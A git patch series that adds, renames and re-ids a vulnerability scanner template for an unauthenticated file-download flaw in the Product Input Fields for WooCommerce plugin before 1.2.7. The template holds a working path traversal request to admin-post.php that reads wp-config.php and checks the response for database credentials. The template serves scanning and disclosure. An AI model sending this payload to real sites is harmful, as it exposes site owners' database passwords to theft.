From c9eaf79f28c9ec728723dfd56035c17def88161d Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Wed, 22 Sep 2021 07:34:09 +0900 Subject: [PATCH 1/3] Create product-input-fields-for-woocommerce-file-download.yaml --- ...-fields-for-woocommerce-file-download.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 product-input-fields-for-woocommerce-file-download.yaml diff --git a/product-input-fields-for-woocommerce-file-download.yaml b/product-input-fields-for-woocommerce-file-download.yaml new file mode 100644 index 0000000000..5c4de213ce --- /dev/null +++ b/product-input-fields-for-woocommerce-file-download.yaml @@ -0,0 +1,29 @@ +id: product-input-fields-for-woocommerce-file-download + +info: + name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download + author: 0x_Akoko + severity: high + tags: wordpress,woocommerce,lfi + description: The lack of authorisation checks in the handle_downloads() function, hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload. + reference: + - https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74 + - https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/ + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From dfa85833e27ed12b3cf144675ac2fae6726f4334 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 22 Sep 2021 18:18:21 +0530 Subject: [PATCH 2/3] misc update --- .../wordpress/wp-woocommerce-file-download.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename product-input-fields-for-woocommerce-file-download.yaml => vulnerabilities/wordpress/wp-woocommerce-file-download.yaml (100%) diff --git a/product-input-fields-for-woocommerce-file-download.yaml b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml similarity index 100% rename from product-input-fields-for-woocommerce-file-download.yaml rename to vulnerabilities/wordpress/wp-woocommerce-file-download.yaml From a898a6c3a646bd2a2830996ba94dad569bef2f10 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 22 Sep 2021 18:19:25 +0530 Subject: [PATCH 3/3] Update wp-woocommerce-file-download.yaml --- vulnerabilities/wordpress/wp-woocommerce-file-download.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml index 5c4de213ce..13aeedf332 100644 --- a/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml +++ b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml @@ -1,4 +1,4 @@ -id: product-input-fields-for-woocommerce-file-download +id: wp-woocommerce-file-download info: name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download